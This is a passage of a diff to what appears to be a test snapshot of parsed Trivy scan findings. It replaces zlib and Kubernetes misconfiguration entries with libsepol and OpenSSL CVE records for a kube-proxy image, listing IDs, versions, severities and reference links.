"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2077431", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2081296", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/show_bug.cgi?id=2116639", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-37434", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8291.html", + "value": "https://github.com/SELinuxProject/selinux/commit/f34d3d30c8325e4847a6b696fe7a3936a8a361f3", }, { "type": "URL", - "value": "https://errata.rockylinux.org/RLSA-2022:8291", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-417.yaml", }, { "type": "URL", - "value": "https://github.com/curl/curl/issues/9271", + "value": "https://linux.oracle.com/cve/CVE-2021-36084.html", }, { "type": "URL", - "value": "https://github.com/ivd38/zlib_overflow", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://github.com/madler/zlib/blob/21767c654d31d2dccdde4330529775c6c5fd5389/zlib.h#L1062-L1063", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/eff308af425b67093bab25f80f1ae950166bece1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/nodejs/node/blob/75b68c6e4db515f76df73af476eccf382bbcb00a/deps/zlib/inflate.c#L762-L764", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-37434.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36084", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36085", + "installedVersion": "2.8-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36085", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", + "https://linux.oracle.com/cve/CVE-2021-36085.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36085", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in __cil_verify_classperms (called from __verify_map_perm_classperms and hashtab_map).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libsepol: use-after-free in __cil_verify_classperms()", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-1095.html", + "value": "https://avd.aquasec.com/nvd/cve-2021-36085", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00012.html", + "value": "https://access.redhat.com/security/cve/CVE-2021-36085", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/JWN4VE3JQR4O2SOUS5TXNLANRPMHWV4I/", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=31124", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/NMBOJ77A7T7PQCARMDUK75TE6LLESZ3O/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PAVPQNCG3XRLCLNSQRM3KAN5ZFMVXVTY/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/X5U7OTKZSHY2I3ZFJSR2SHFHW72RKGDK/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/YRQAI7H4M4RQZ2IWZUEEXECBE5D56BH2/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-37434", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220901-0005/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20230427-0007/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213488", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213489", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213490", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213491", + "value": "https://github.com/SELinuxProject/selinux/commit/2d35fcc7e9e976a2346b1de20e54f8663e8a6cba", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213493", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-421.yaml", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213494", + "value": "https://linux.oracle.com/cve/CVE-2021-36085.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-1", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5570-2", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5573-1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36085", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-37434", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5218", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36085", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "1.2.12-r0", - "foundIn": "Target: 'docker.io/rancher/local-path-provisioner:v0.0.14 (alpine 3.12.0)' / Class: 'os-pkgs' / Type: 'alpine'", - "id": "CVE-2018-25032", - "installedVersion": "1.2.11-r3", - "packageName": "zlib", + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36086", + "installedVersion": "2.8-1", + "packageName": "libsepol1", "references": [ - "http://seclists.org/fulldisclosure/2022/May/33", - "http://seclists.org/fulldisclosure/2022/May/35", - "http://seclists.org/fulldisclosure/2022/May/38", - "http://www.openwall.com/lists/oss-security/2022/03/25/2", - "http://www.openwall.com/lists/oss-security/2022/03/26/1", - "https://access.redhat.com/errata/RHSA-2022:8420", - "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", - "https://access.redhat.com/security/cve/CVE-2018-25032", - "https://bugzilla.redhat.com/2067945", - "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", - "https://errata.almalinux.org/9/ALSA-2022-8420.html", - "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", - "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", - "https://github.com/madler/zlib/issues/605", - "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", - "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", - "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", - "https://linux.oracle.com/cve/CVE-2018-25032.html", - "https://linux.oracle.com/errata/ELSA-2022-9565.html", - "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", - "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", - "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", - "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", - "https://security.gentoo.org/glsa/202210-42", - "https://security.netapp.com/advisory/ntap-20220526-0009/", - "https://security.netapp.com/advisory/ntap-20220729-0004/", - "https://support.apple.com/kb/HT213255", - "https://support.apple.com/kb/HT213256", - "https://support.apple.com/kb/HT213257", - "https://ubuntu.com/security/notices/USN-5355-1", - "https://ubuntu.com/security/notices/USN-5355-2", - "https://ubuntu.com/security/notices/USN-5359-1", - "https://ubuntu.com/security/notices/USN-5359-2", - "https://ubuntu.com/security/notices/USN-5739-1", - "https://www.cve.org/CVERecord?id=CVE-2018-25032", - "https://www.debian.org/security/2022/dsa-5111", - "https://www.openwall.com/lists/oss-security/2022/03/24/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/1", - "https://www.openwall.com/lists/oss-security/2022/03/28/3", - "https://www.oracle.com/security-alerts/cpujul2022.html", + "https://access.redhat.com/security/cve/CVE-2021-36086", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", + "https://linux.oracle.com/cve/CVE-2021-36086.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36086", ], }, "category": "Vulnerability", - "description": "zlib before 1.2.12 allows memory corruption when deflating (i.e., when compressing) if the input has many distant matches.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", + "description": "The CIL compiler in SELinux 3.2 has a use-after-free in cil_reset_classpermission (called from cil_reset_classperms_set and cil_reset_classperms_list).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", "mitigation": undefined, - "name": "A flaw found in zlib when compressing (not decompressing) certain inputs", + "name": "use-after-free in cil_reset_classpermission()", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2018-25032", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/33", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/35", - }, - { - "type": "URL", - "value": "http://seclists.org/fulldisclosure/2022/May/38", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/25/2", - }, - { - "type": "URL", - "value": "http://www.openwall.com/lists/oss-security/2022/03/26/1", + "value": "https://avd.aquasec.com/nvd/cve-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2022:8420", + "value": "https://access.redhat.com/security/cve/CVE-2021-36086", }, { "type": "URL", - "value": "https://access.redhat.com/hydra/rest/securitydata/cve/CVE-2018-25032.json", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32177", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2018-25032", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2067945", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://cert-portal.siemens.com/productcert/pdf/ssa-333517.pdf", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-25032", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2022-8420.html", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://github.com/madler/zlib/commit/5c44459c3b28a9bd3283aaceab7c615f8020c531", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://github.com/madler/zlib/compare/v1.2.11...v1.2.12", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://github.com/madler/zlib/issues/605", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/releases/tag/v1.13.4", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://github.com/sparklemotion/nokogiri/security/advisories/GHSA-v6gp-9mmm-c6p5", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://groups.google.com/g/ruby-security-ann/c/vX7qSjsvWis/m/TJWN4oOKBwAJ", + "value": "https://github.com/SELinuxProject/selinux/commit/c49a8ea09501ad66e799ea41b8154b6770fec2c8", }, { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2018-25032.html", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-536.yaml", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-9565.html", + "value": "https://linux.oracle.com/cve/CVE-2021-36086.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/04/msg00000.html", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/05/msg00008.html", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://lists.debian.org/debian-lts-announce/2022/09/msg00023.html", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36086", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DCZFIJBJTZ7CL5QXBFKTQ22Q26VINRUF/", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DF62MVMH3QUGMBDCB3DY2ERQ6EBHTADB/", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36086", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-36087", + "installedVersion": "2.8-1", + "packageName": "libsepol1", + "references": [ + "https://access.redhat.com/security/cve/CVE-2021-36087", + "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", + "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", + "https://errata.almalinux.org/8/ALSA-2021-4513.html", + "https://errata.rockylinux.org/RLSA-2021:4513", + "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", + "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", + "https://linux.oracle.com/cve/CVE-2021-36087.html", + "https://linux.oracle.com/errata/ELSA-2021-4513.html", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", + "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", + "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", + "https://ubuntu.com/security/notices/USN-5391-1", + "https://www.cve.org/CVERecord?id=CVE-2021-36087", + ], + }, + "category": "Vulnerability", + "description": "The CIL compiler in SELinux 3.2 has a heap-based buffer over-read in ebitmap_match_any (called indirectly from cil_check_neverallow). This occurs because there is sometimes a lack of checks for invalid statements in an optional block.", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "libsepol: heap-based buffer overflow in ebitmap_match_any()", + "references": [ { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/JZZPTWRYQULAOL3AW7RZJNVZ2UONXCV4/", + "value": "https://avd.aquasec.com/nvd/cve-2021-36087", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/NS2D2GFPFGOJUL4WQ3DUAY7HF4VWQ77F/", + "value": "https://access.redhat.com/security/cve/CVE-2021-36087", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/VOKNP2L734AEL47NRYGVZIKEFOUBQY5Y/", + "value": "https://bugs.chromium.org/p/oss-fuzz/issues/detail?id=32675", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XOKFMSNQ5D5WGMALBNBXU3GE442V74WU/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979662", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2018-25032", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979664", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202210-42", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979666", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220526-0009/", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=1979668", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0004/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36084", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213255", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36085", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213256", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36086", }, { "type": "URL", - "value": "https://support.apple.com/kb/HT213257", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-36087", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-1", + "value": "https://errata.almalinux.org/8/ALSA-2021-4513.html", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5355-2", + "value": "https://errata.rockylinux.org/RLSA-2021:4513", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-1", + "value": "https://github.com/SELinuxProject/selinux/commit/340f0eb7f3673e8aacaf0a96cbfcd4d12a405521", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5359-2", + "value": "https://github.com/google/oss-fuzz-vulns/blob/main/vulns/selinux/OSV-2021-585.yaml", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5739-1", + "value": "https://linux.oracle.com/cve/CVE-2021-36087.html", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2018-25032", + "value": "https://linux.oracle.com/errata/ELSA-2021-4513.html", }, { "type": "URL", - "value": "https://www.debian.org/security/2022/dsa-5111", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/U7ZYR3PIJ75N6U2IONJWCKZ5L2NKJTGR/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/24/1", + "value": "https://lore.kernel.org/selinux/CAEN2sdqJKHvDzPnxS-J8grU8fSf32DDtx=kyh84OsCq_Vm+yaQ@mail.gmail.com/T/", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/1", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-36087", }, { "type": "URL", - "value": "https://www.openwall.com/lists/oss-security/2022/03/28/3", + "value": "https://ubuntu.com/security/notices/USN-5391-1", }, { "type": "URL", - "value": "https://www.oracle.com/security-alerts/cpujul2022.html", + "value": "https://www.cve.org/CVERecord?id=CVE-2021-36087", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV001", - "installedVersion": undefined, - "packageName": undefined, + "fixedVersion": "1.1.1d-0+deb10u7", + "foundIn": "Target: 'k8s.gcr.io/kube-proxy:v1.21.1 (debian 10.9)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2021-3711", + "installedVersion": "1.1.1d-0+deb10u6", + "packageName": "libssl1.1", "references": [ - "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", - "https://avd.aquasec.com/misconfig/ksv001", + "http://www.openwall.com/lists/oss-security/2021/08/26/2", + "https://access.redhat.com/security/cve/CVE-2021-3711", + "https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-3711", + "https://git.openssl.org/gitweb/?p=openssl.git;a=commitdiff;h=59f5e75f3bced8fc0e130d72a3f582cf7b480b46", + "https://github.com/advisories/GHSA-5ww6-px42-wc85", + "https://lists.apache.org/thread.html/r18995de860f0e63635f3008fd2a6aca82394249476d21691e7c59c9e@%3Cdev.tomcat.apache.org%3E", + "https://lists.apache.org/thread.html/rad5d9f83f0d11fb3f8bb148d179b8a9ad7c6a17f18d70e5805a713d1@%3Cdev.tomcat.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2021-3711", + "https://rustsec.org/advisories/RUSTSEC-2021-0097.html", + "https://security.gentoo.org/glsa/202209-02", + "https://security.gentoo.org/glsa/202210-02", + "https://security.netapp.com/advisory/ntap-20210827-0010/", + "https://security.netapp.com/advisory/ntap-20211022-0003/", + "https://ubuntu.com/security/notices/USN-5051-1", + "https://www.cve.org/CVERecord?id=CVE-2021-3711", + "https://www.debian.org/security/2021/dsa-4963", + "https://www.openssl.org/news/secadv/20210824.txt", + "https://www.oracle.com/security-alerts/cpuapr2022.html", + "https://www.oracle.com/security-alerts/cpujan2022.html", + "https://www.oracle.com/security-alerts/cpuoct2021.html", + "https://www.tenable.com/security/tns-2021-16", + "https://www.tenable.com/security/tns-2022-02", ], }, - "category": "Misconfiguration", - "description": "A program inside the container can elevate its own privileges and run as root, which might give the program control over the container and node.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set 'set containers[].securityContext.allowPrivilegeEscalation' to 'false'.", - "name": "Process can elevate its own privileges(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'securityContext.allowPrivilegeEscalation' to false)", + "category": "Vulnerability", + "description": "In order to decrypt SM2 encrypted data an application is expected to call the API function EVP_PKEY_decrypt(). Typically an application will call this function twice. The first time, on entry, the "out" parameter can be NULL and, on exit, the "outlen" parameter is populated with the buffer size required to hold the decrypted plaintext. The application can then allocate a sufficiently sized buffer and call EVP_PKEY_decrypt() again, but this time passing a non-NULL value for the "out" parameter. A bug in the implementation of the SM2 decryption code means that the calculation of the buffer size required to hold the plaintext returned by the first call to EVP_PKEY_decrypt() can be smaller than the actual size required by the second call. This can lead to a buffer overflow when EVP_PKEY_decrypt() is called by the application a second time with a buffer that is too small. A malicious attacker who is able present SM2 content for decryption to an application could cause attacker chosen data to overflow the buffer by up to a maximum of 62 bytes altering the contents of other data held after the buffer, possibly changing application behaviour or causing the application to crash. The location of the buffer is application dependent but is typically heap allocated. Fixed in OpenSSL 1.1.1l (Affected 1.1.1-1.1.1k).", + "location": "scb://trivy/?Namespace=kube-system&Kind=DaemonSet&Name=kube-proxy", + "mitigation": undefined, + "name": "openssl: SM2 Decryption Buffer Overflow", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv001", - }, - { - "type": "URL", - "value": "https://kubernetes.io/docs/concepts/security/pod-security-standards/#restricted", + "value": "https://avd.aquasec.com/nvd/cve-2021-3711", }, - ], - "severity": "MEDIUM", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV003", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", - "https://avd.aquasec.com/misconfig/ksv003", - ], - }, - "category": "Misconfiguration", - "description": "The container should drop all default capabilities and add only those that are needed for its execution.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Add 'ALL' to containers[].securityContext.capabilities.drop.", - "name": "Default capabilities not dropped(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should add 'ALL' to 'securityContext.capabilities.drop')", - "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/misconfig/ksv003", + "value": "http://www.openwall.com/lists/oss-security/2021/08/26/2", }, { "type": "URL", - "value": "https://kubesec.io/basics/containers-securitycontext-capabilities-drop-index-all/", + "value": "https://access.redhat.com/security/cve/CVE-2021-3711", }, - ], - "severity": "LOW", - }, - { - "attributes": { - "fixedVersion": undefined, - "foundIn": "Target: 'Deployment/local-path-provisioner' / Class: 'config' / Type: 'kubernetes'", - "id": "KSV011", - "installedVersion": undefined, - "packageName": undefined, - "references": [ - "https://cloud.google.com/blog/products/containers-kubernetes/kubernetes-best-practices-resource-requests-and-limits", - "https://avd.aquasec.com/misconfig/ksv011", - ], - }, - "category": "Misconfiguration", - "description": "Enforcing CPU limits prevents DoS via resource exhaustion.", - "location": "scb://trivy/?Namespace=local-path-storage&Kind=Deployment&Name=local-path-provisioner", - "mitigation": "Set a limit value under 'containers[].resources.limits.cpu'.", - "name": "CPU not limited(Container 'local-path-provisioner' of Deployment 'local-path-provisioner' should set 'resources.limits.cpu')", - "references": [ { "type": "URL", - "value": 